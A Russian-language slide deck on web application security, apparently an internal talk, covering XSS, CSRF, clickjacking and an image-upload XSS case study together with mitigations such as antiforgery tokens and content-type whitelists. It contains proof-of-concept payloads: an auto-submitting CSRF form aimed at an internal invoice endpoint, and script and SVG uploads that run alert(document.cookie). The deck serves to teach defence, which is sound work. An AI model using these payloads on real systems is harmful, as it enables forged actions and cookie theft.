Безопасность

Атаки

  • XSS
  • CSRF
  • SQL Injection
  • ....

XSS

XSS

// Нельзя:

node.innerHTML = userData;

// Можно

node.textContent = userData;

// или так:

node.innerHTML = sanitize(userData)

CSRF

Учет счетов

<form name="attack"
    enctype="multipart/form-data"
    action="http://orvis-1.kontur:7090/invoice/211529" 
    method="POST">

  <input type="hidden" name='managerId' value='32' />
  <input type="hidden" name='InvoiceUpdateInfo.InvoiceActionTypeId' value='1' />

  <! -- OTHER PARAMETERS -->

</form>

<script>document.attack.submit();</script>

Учет счетов

CSRF

Подвержены атаке:

  • Cookie, Basic, NTLM

Решение:

  • Antiforgery tokens
  • Referer check
  • OAuth bearer tokens

Про Стаф Стафф

Топ 3

"Никакой защиты" (с)

  • Request throttling
  • Captcha

Топ 2

Кликджекинг

X-FRAME-OPTIONS: DENY|SAME-ORIGIN

Топ 1

Images API (XSS)

Images API

POST api/images

{
    "imageInfoList": [
        {
            "filePath": "wKTI6b/myphoto.jpg",
            "contentType": "image/jpeg",
            "resolution": {
                "width": 1024,
                "height": 768
            }
        }
    ]
}

GET api/images/wKTI6b/myphoto.jpg?size=L

Content-Disposition: filename="myphoto.jpg"
Content-Type: image/jpeg
<BLOB>

Content-Type: image/jpeg

Images API

POST api/images

{
    "imageInfoList": [
        {
            "filePath": "wKTI6b/myphoto.jpg",
            "contentType": "text/html",
            "resolution": {
                "width": 1024,
                "height": 768
            }
        }
    ]
}

GET api/images/wKTI6b/myphoto.jpg?size=L

Content-Disposition: filename="myphoto.jpg"
Content-Type: text/html
<BLOB>

Content-Type: text/html

Images API

POST api/images

Content-Disposition: filename="myphoto.jpg"
Content-Type: text/html
<script>alert(1);</script>

Images API

POST api/images

Content-Disposition: filename="myphoto.png"
Content-Type: text/html
<BLOB>
<script>alert(1);</script>

GET https://staff.skbkontur.ru/api/images/wKTI6b/myphoto.png

Content-Type: text/html

Images API

<iframe src="/api/images/wKTI6b/myphoto.png"></iframe>

Images API

Allow "image/*"

image/svg+xml

<svg height="100" width="100">
  <circle cx="50" cy="50" r="40" fill="red" />
  <script>alert(document.cookie)</script>
</svg>

Images API

blob.domain.com

content type whitelist

Вопросы?

Безопасность

By Viacheslav Bukharin

Безопасность

  • 47
Loading comments...

More from Viacheslav Bukharin